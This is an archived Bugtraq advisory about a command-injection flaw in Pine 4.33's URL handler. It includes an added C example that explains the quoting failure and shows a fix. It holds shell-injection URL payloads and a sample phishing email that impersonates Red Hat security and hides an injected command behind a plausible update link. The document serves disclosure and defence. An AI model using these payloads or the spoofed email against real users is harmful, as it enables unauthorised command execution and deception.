Bugtraq mailing list archives

Pine 4.33 (at least) URL handler allows embedded commands.


From: zen-parse <zen-parse () gmx net>
Date: Sat, 5 Jan 2002 15:17:16 +1300 (NZDT)

Systems:                Pine 4.33 (under Redhat 7.0)
                        (Probably many others, haven't checked much)

Vendors notified:       Sat, 20 Oct 2001 06:50:12 +1300 (NZDT)
And again:              Fri, 9 Nov 2001 07:14:15 +1300 (NZDT)
And again:              Thu, 3 Jan 2002 08:15:55 +1300 (NZDT)

Problem:                URL handler allows embedded commands.
                        May allow email viruses of the Outlook kind.

Severity:               Extremely Low -> Very High (Dependent on current 
                        email reading habits)

Workaround:             Don't view URLs from inside Pine. 
                        (ObSpam: Except for http://mp3.com/cosv/ ;])

Details:

 This is a similar problem to the xchat 1.4.1 URL handler vulnerability.
 http://www.securityfocus.com/bid/1601


 In Pine, if a user selects a URL of the form 

  http://address/'&/some/program${IFS}with${IFS}arguments&'

 and URL handlers are installed, they will end up with the browser open
 on 

  http://address/

 and 

  /some/program with arguments

 will get executed.
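As an added example (not part of zen-parse's post and not Pine's code), the C program below shows why an apostrophe in the URL breaks a handler template that single-quotes the URL, and the quoting that closes the hole. It assumes a handler template of the shape `lynx '_URL_'`; the `lynx` name, the template and the metacharacter list are constructed for the example. The two test URLs are the generic form above and the href from the HTML sample later in the post; `unquoted_metachar()` walks the expanded command the way sh tokenises single quotes and reports the first metacharacter that ended up outside them.

```c
#include <stdio.h>
#include <string.h>

/* Both URLs are copied from the post: the generic form and the HTML href. */
const char *PAYLOAD_GENERIC =
    "http://address/'&/some/program${IFS}with${IFS}arguments&'";
const char *PAYLOAD_HTML =
    "http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/"
    "hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/";

/* Characters that let sh start a new command, pipeline or substitution when
 * they appear outside quotes. This list is the example's own. */
static const char META[] = "&;|`$<>()\n";

/* Naive expansion of a handler template of the shape   lynx '_URL_'
 * (constructed; not Pine's real configuration). The URL is dropped between
 * single quotes with no escaping, so an apostrophe inside it closes the
 * quote early. Returns 0, or -1 if out is too small. */
int naive_command(const char *url, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "lynx '%s'", url);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Single-quote an arbitrary string for /bin/sh: wrap it in '...' and replace
 * each embedded apostrophe with '\'' (close, escaped apostrophe, reopen).
 * Inside single quotes sh treats $ & ; | ` and whitespace literally, so
 * ${IFS} is never expanded. Returns 0, or -1 if out is too small. */
int shell_quote(const char *s, char *out, size_t outlen)
{
    size_t j = 0;
    if (outlen < 3) return -1;
    out[j++] = '\'';
    for (; *s; s++) {
        if (*s == '\'') {
            if (j + 6 > outlen) return -1;   /* 4 bytes + closing quote + NUL */
            memcpy(out + j, "'\\''", 4);
            j += 4;
        } else {
            if (j + 3 > outlen) return -1;   /* 1 byte + closing quote + NUL */
            out[j++] = *s;
        }
    }
    out[j++] = '\'';
    out[j] = '\0';
    return 0;
}

/* The same template, with the URL passed through shell_quote() first. */
int safe_command(const char *url, char *out, size_t outlen)
{
    char quoted[1024];
    if (shell_quote(url, quoted, sizeof quoted) != 0) return -1;
    int n = snprintf(out, outlen, "lynx %s", quoted);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Scan a command line the way sh handles single quotes and backslashes and
 * return the first metacharacter found OUTSIDE single quotes, or NULL.
 * Double quotes are not modelled: this checks single-quoting templates only. */
const char *unquoted_metachar(const char *cmd)
{
    int in_squote = 0;
    for (; *cmd; cmd++) {
        if (in_squote) {
            if (*cmd == '\'') in_squote = 0;
        } else if (*cmd == '\'') {
            in_squote = 1;
        } else if (*cmd == '\\' && cmd[1]) {
            cmd++;                           /* backslash-escaped: skip it */
        } else if (strchr(META, *cmd)) {
            return cmd;
        }
    }
    return NULL;
}

/* 1 if expanding the template with this URL leaves a metacharacter outside
 * quotes (sh would run extra commands), 0 if the URL stays one argument,
 * -1 on buffer overflow. quoted=1 uses shell_quote(), 0 the naive form. */
int leaks_into_shell(const char *url, int quoted)
{
    char cmd[2048];
    int rc = quoted ? safe_command(url, cmd, sizeof cmd)
                    : naive_command(url, cmd, sizeof cmd);
    return rc != 0 ? -1 : unquoted_metachar(cmd) != NULL;
}

int main(void)
{
    const char *urls[] = { PAYLOAD_GENERIC, PAYLOAD_HTML };
    char cmd[2048];
    for (int i = 0; i < 2; i++) {
        naive_command(urls[i], cmd, sizeof cmd);
        const char *m = unquoted_metachar(cmd);
        printf("naive : %s\n   first unquoted metachar: %s\n", cmd, m ? m : "(none)");
        safe_command(urls[i], cmd, sizeof cmd);
        m = unquoted_metachar(cmd);
        printf("quoted: %s\n   first unquoted metachar: %s\n", cmd, m ? m : "(none)");
    }
    return 0;
}
```

The naive form is safe only for URLs that contain no apostrophe, which is exactly the character the post's payload relies on; the quoted form keeps the whole URL as a single word for sh, so `${IFS}` stays literal too. Passing the URL as its own argv element to `execvp()` and skipping the shell entirely is the stronger fix; the quoting shown here is for handlers that must go through a shell template.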

 If you are reading your email as root, these commands will execute as
 root. (Create an alias for root to a non-privileged user instead of
 reading mail as root.)

 If you are reading your email as a non-privileged user, the impact is
 somewhat lower, although local exploits could be run on the computer, or
 Outlook style email viruses could be executed.

 If you don't view links given to you in Pine, the impact from this
 problem is non-existent.

 It is possible to obfuscate the URL by putting it in an HTML message
 such as the following.

----Begin html email----
From: Redhat Network Security <rhnsecurity () redhat com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/html
Content-ID: <Pine.LNX.4.33.0110221214120.9618@clarity.local>
Content-Length: 389
Lines: 12

<HTML>
<BODY>
Urgent update:<p>
PINE allows execution of arbitrary commands.<p>

<a 
href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/";>
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/</a>
<p>

This link contains PINE update information. <p>

You are advised to perform this immediately. <p>

The link also contains other urgent update information. <p>

</BODY>
</HTML>
----End html email----


Which would appear something like
----Begin view of email----

Date: Mon, 22 Oct 2001 13:34:40 +1300
From: Redhat Network Security <rhnsecurity () redhat com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE

Urgent update:

PINE allows execution of arbitrary commands.

http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
e-in-pine-url-handler/

This link contains PINE update information.

You are advised to perform this immediately.

The link also contains other urgent update information.

----End view of email----


 When this link is selected to follow, Pine changes the status/menu lines
 to read:

View selected URL "http://updates.redhat.com/update_information/urgent/r..."; ?  
Y [Yes]                   U editURL                                             
N No                      A editApp              

 This appears to match the URL in the email. This probably makes detection
 of this kind of exploit attempt harder. 

 -- zen-parse

[ A (relatively) safe way to visit http://mp3.com/cosv is to type the
  address into the address bar of the browser you are using. Contrary to a
  rumour posted several days ago, the only way I get any money from this
  site is through CD purchases. If you want to, visit the site and listen
  to the music. If you like it, you might want to buy it, or not. I hope
  nobody has any illusion of being tricked into visiting. ]


-- 
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.  
If this message was posted by zen-parse () gmx net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
